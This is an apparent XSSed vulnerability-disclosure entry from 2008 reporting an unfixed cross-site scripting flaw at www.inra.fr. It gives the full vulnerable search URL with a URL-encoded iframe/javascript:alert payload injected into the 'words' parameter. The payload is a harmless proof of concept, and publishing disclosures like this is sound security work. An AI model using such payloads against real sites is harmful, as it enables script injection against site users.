Unfixed XSS vulnerability at www.inra.fr

2008-07-06T00:00:00
ID XSSED:41269
Type xssed
Reporter Zeryus
Modified 2008-07-06T00:00:00

Description

Security researcher Zeryus, has submitted on 07/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.inra.fr, which at the time of submission ranked 31238 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.inra.fr/cgi-bin/admin/htdig/htsearch?restrict=http%3A%2F%2Fwww.inra.fr%2Fdrh%2F&method=and&format=builtin_long&matchesperpages=25&sort=score&config=htsearch_webINRA&exclude=&words=%3Ciframe+name%3D%27%27+SRC%3D%27javascript%3Aalert%28157%29%27+scrolling%3D%27yes%27+height%3D%27220%27+width%3D%27180%27+FRAMEBORDER%3D%27yes%27%3E%3C%2Fiframe%3E%3Cmarquee%3E%3Ch1%3EXSS+by+Zeryus%3C%2Fh1%3E%3C%2Fmarquee%3E&submit=Ok